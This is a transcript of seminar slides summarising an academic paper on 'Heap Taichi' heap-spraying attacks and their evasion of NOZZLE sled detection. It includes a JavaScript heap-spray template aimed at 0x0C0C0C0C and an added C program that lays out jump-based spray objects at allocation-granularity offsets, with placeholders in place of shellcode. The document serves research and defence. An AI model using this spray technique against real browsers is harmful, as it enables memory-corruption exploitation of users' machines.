Heap Taichi: Exploiting Memory Allocation Granularity in Heap-Spraying Attacks. Yu Ding, Tao Wei, TieLei Wang (Peking University); Zhenkai Liang (National University of Singapore); Wei Zou (Peking University). 26th ACSAC (December, 2010).
Feb 24, 2016

Transcript
Page 1: Heap Taichi: Exploiting Memory Allocation Granularity in Heap-Spraying Attacks

Yu Ding, Tao Wei, TieLei Wang (Peking University)
Zhenkai Liang (National University of Singapore)
Wei Zou (Peking University)
26th ACSAC (December, 2010)

Page 2: Outline

A Seminar at Advanced Defense Lab

Introduction
Research Approaches
Heap Spraying with Little Surface Area
Experiment and Evaluation

Page 4: Heap Spray

[Figure: a memory corruption redirects control into the heap, which the attacker has filled with many copies of NOP sled + shellcode]

Heap addresses are less predictable than a single fixed target, and there may be a mechanism that randomizes the heap layout, so the attacker fills the heap with many copies of the payload instead of aiming at one address:

    <SCRIPT type="text/javascript">
    // Shellcode, given as UTF-16 escapes (elided in the slide).
    shellcode = unescape("%u4343%u4343%...");
    // 0x0C 0x0C decodes on x86 as "or al, 0Ch": a NOP-equivalent sled byte.
    // 0x0C0C0C0C is also the address the corrupted pointer is steered to,
    // so a landing anywhere in the sled slides into the shellcode.
    oneblock = unescape("%u0C0C%u0C0C");
    var fullblock = oneblock;
    // Double the string until it holds 0x40000 UTF-16 code units (512 KB).
    while (fullblock.length < 0x40000) {
        fullblock += fullblock;
    }
    // Allocate 1000 sled+shellcode objects so that they cover the target address.
    sprayContainer = new Array();
    for (i = 0; i < 1000; i++) {
        sprayContainer[i] = fullblock + shellcode;
    }
    </SCRIPT>

Page 5: Heap spraying (cont.)

Why spraying? We need the hijacked control flow to land inside one of the sprayed objects.

Why a NOP sled? Wherever we land inside the object, execution must slide forward and reach the first instruction of the shellcode.

Page 6: Research Approaches

Shellcode-oriented detection

But ... "English Shellcode"? (my opinion)

Sled-oriented detection: NOZZLE

Page 7: The Design of NOZZLE

NOZZLE attempts to discover objects in which control flow through the object (the NOP sled) frequently reaches the same basic block(s) (the shellcode).

[Figure: heap object -> disassemble -> control flow graph]

Page 8: The Design of NOZZLE (cont.)

Compute the attack surface area of object o as the maximum surface area over the basic blocks BB_i of its control flow graph C:

    SA(o) = \max_i SA(BB_i, C)

The attack surface area of a heap H containing n objects is defined as follows:

    SA(H) = \sum_{i=1}^{n} SA(o_i)

The normalized attack surface area of the heap divides by the heap size |H|:

    NSA(H) = \frac{SA(H)}{|H|}

Page 9: Limitation (in the paper of NOZZLE): Jump into Page

The attacker allocates page-size chunks of memory, so every chunk starts on a page boundary.

[Figure: three page-aligned chunks, each holding the shellcode at the same offset from its page boundary]

Fixed offset!!

The goal of this paper!!

Page 10: Heap Spraying with Little Surface Area

Memory allocation granularity:
Linux: 4KB
Windows: 64KB (the virtual-address allocation granularity that VirtualAlloc reservations are rounded to, reported by GetSystemInfo as dwAllocationGranularity; the page size itself is 4KB on both systems)

When a heap object is bigger than a certain threshold, 512K in our experiment, Windows always allocates a separate heap block for this object.

Page 11: Observation

If an EIP assigned by an attacker has only a few possible locations in a large heap object, the attacker only needs to put jump-equivalent instructions at those locations.

In fact, an EIP assigned by an attacker can only point to EIGHT possible locations in a 512K-byte heap object: every such object starts on a 64KB boundary, so the low 16 bits of the target address fix its offset within a 64KB granule, and the object spans only 512K / 64K = 8 granules.
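The arithmetic behind the "eight locations" observation, as an added example that is not code from the paper or the slides. It assumes the parameters of pages 10 and 11 (64KB allocation granularity, 512KB objects, target address 0x0C0C0C0C) and uses a constructed placeholder byte string in place of shellcode. It lays out one Taichi object (non-sled filler, shellcode at the end, an x86 "jmp rel32" at each candidate landing offset), steps a one-instruction emulator from every candidate offset to confirm each reaches the shellcode, compares the sled bytes a sled-oriented detector would see with those of the classic spray on page 4, and, going beyond the slide, recomputes the candidate count under the 4KB granularity that page 16's smaller-alignment mitigation would impose:

```c
/* Added example, not from the Heap Taichi paper or the slides. Assumed
 * parameters: 64 KB granularity (Windows), 512 KB objects, target 0x0C0C0C0C.
 * The "shellcode" is a constructed marker string, not real shellcode. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WIN_GRAN     0x10000u     /* Windows allocation granularity, 64 KB */
#define LINUX_GRAN   0x1000u      /* Linux page granularity, 4 KB */
#define OBJ_SIZE     0x80000u     /* sprayed object size, 512 KB */
#define TARGET_ADDR  0x0C0C0C0Cu  /* attacker-chosen value of the hijacked EIP */
#define JMP_LEN      5u           /* x86 "jmp rel32": E9 + 4-byte displacement */
#define MAX_LANDINGS 256

/* Candidate offsets of `target` inside an object whose base is aligned to
 * `gran`: the low (target % gran) part is fixed, only the granule index k
 * varies, so there are obj_size / gran candidates. Returns the count. */
size_t taichi_offsets(uint32_t target, uint32_t gran, uint32_t obj_size,
                      uint32_t *out, size_t max_out)
{
    size_t n = obj_size / gran;
    if (n > max_out) n = max_out;
    for (size_t k = 0; k < n; k++)
        out[k] = (uint32_t)k * gran + target % gran;
    return n;
}

/* Lay out a Taichi object: filler of 0xCC (int3, traps instead of sliding),
 * the shellcode at the end, and a jmp rel32 to it at every candidate offset.
 * Returns the shellcode offset, or 0 if the layout does not fit. */
uint32_t build_taichi_object(uint8_t *obj, uint32_t obj_size,
                             const uint8_t *sc, uint32_t sc_len,
                             uint32_t gran, uint32_t target)
{
    if (sc_len == 0 || sc_len >= obj_size) return 0;
    uint32_t sc_off = obj_size - sc_len;
    memset(obj, 0xCC, obj_size);
    memcpy(obj + sc_off, sc, sc_len);

    uint32_t offs[MAX_LANDINGS];
    size_t n = taichi_offsets(target, gran, obj_size, offs, MAX_LANDINGS);
    if (n != obj_size / gran) return 0;           /* more granules than MAX_LANDINGS */
    for (size_t k = 0; k < n; k++) {
        uint32_t off = offs[k];
        if (off + JMP_LEN > sc_off) return 0;     /* jump would overlap the shellcode */
        uint32_t rel = sc_off - (off + JMP_LEN);  /* displacement from end of the jmp */
        obj[off] = 0xE9;
        for (int b = 0; b < 4; b++)               /* little-endian immediate */
            obj[off + 1 + b] = (uint8_t)(rel >> (8 * b));
    }
    return sc_off;
}

/* One-instruction x86 step: if `pc` holds a jmp rel32 return its target
 * offset, else UINT32_MAX (execution traps on the filler). */
uint32_t follow_jmp(const uint8_t *obj, uint32_t obj_size, uint32_t pc)
{
    if (pc + JMP_LEN > obj_size || obj[pc] != 0xE9) return UINT32_MAX;
    uint32_t rel = 0;
    for (int b = 0; b < 4; b++)
        rel |= (uint32_t)obj[pc + 1 + b] << (8 * b);
    return pc + JMP_LEN + rel;                    /* unsigned wrap handles negative rel */
}

/* How many of the candidate landing offsets actually reach the shellcode. */
size_t good_landings(const uint8_t *obj, uint32_t obj_size, uint32_t sc_off,
                     uint32_t gran, uint32_t target)
{
    uint32_t offs[MAX_LANDINGS];
    size_t n = taichi_offsets(target, gran, obj_size, offs, MAX_LANDINGS);
    size_t good = 0;
    for (size_t k = 0; k < n; k++)
        if (follow_jmp(obj, obj_size, offs[k]) == sc_off) good++;
    return good;
}

/* Bytes a sled-oriented detector can count as sled: the classic spray fills
 * everything before the shellcode with NOP-equivalents, Taichi only the jmps. */
uint32_t classic_sled_bytes(uint32_t obj_size, uint32_t sc_len) { return obj_size - sc_len; }
uint32_t taichi_sled_bytes(uint32_t obj_size, uint32_t gran) { return (obj_size / gran) * JMP_LEN; }

static uint8_t g_obj[OBJ_SIZE];

/* Build the object for the given granularity and count the working landings. */
size_t demo_landings(uint32_t gran)
{
    static const uint8_t sc[] = "SHELLCODE-PLACEHOLDER";   /* constructed marker */
    uint32_t sc_off = build_taichi_object(g_obj, OBJ_SIZE, sc, sizeof sc, gran, TARGET_ADDR);
    return sc_off ? good_landings(g_obj, OBJ_SIZE, sc_off, gran, TARGET_ADDR) : 0;
}

int main(void)
{
    printf("64KB granularity: %zu of %u landings reach the shellcode\n",
           demo_landings(WIN_GRAN), OBJ_SIZE / WIN_GRAN);
    printf("sled bytes: classic %u vs Taichi %u\n",
           classic_sled_bytes(OBJ_SIZE, 22), taichi_sled_bytes(OBJ_SIZE, WIN_GRAN));
    printf("4KB granularity: %zu jump sites needed instead of 8\n", demo_landings(LINUX_GRAN));
    return 0;
}
```

With the Windows parameters the eight jmp instructions total 40 bytes of sled against the 524,266 sled bytes of the page 4 spray, which is why the normalized surface area of page 8 drops to almost nothing; with 4KB alignment the attacker needs 128 jump sites, still only 640 bytes, which is the page 16 point that smaller alignment raises the cost but does not by itself restore a large sled.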

Page 12

Page 13: Malicious Heap Object

Page 14: If the alignment is small

Page 15: Detecting Heap Taichi Attacks

NOZZLE can be enhanced to detect some of the new attacks by considering the effect of memory allocation granularity.

Page 16: Detecting Heap Taichi Attacks (cont.)

A natural solution to prevent Heap Taichi attacks and similar attacks is to align memory allocations at a smaller-sized boundary.

But ... there are many heap managers on different levels of a program, each of which has its own heap management strategy.

Page 17: Experiment and Evaluation

Case study:

Page 18

Page 19: Result

Page 20: Thank You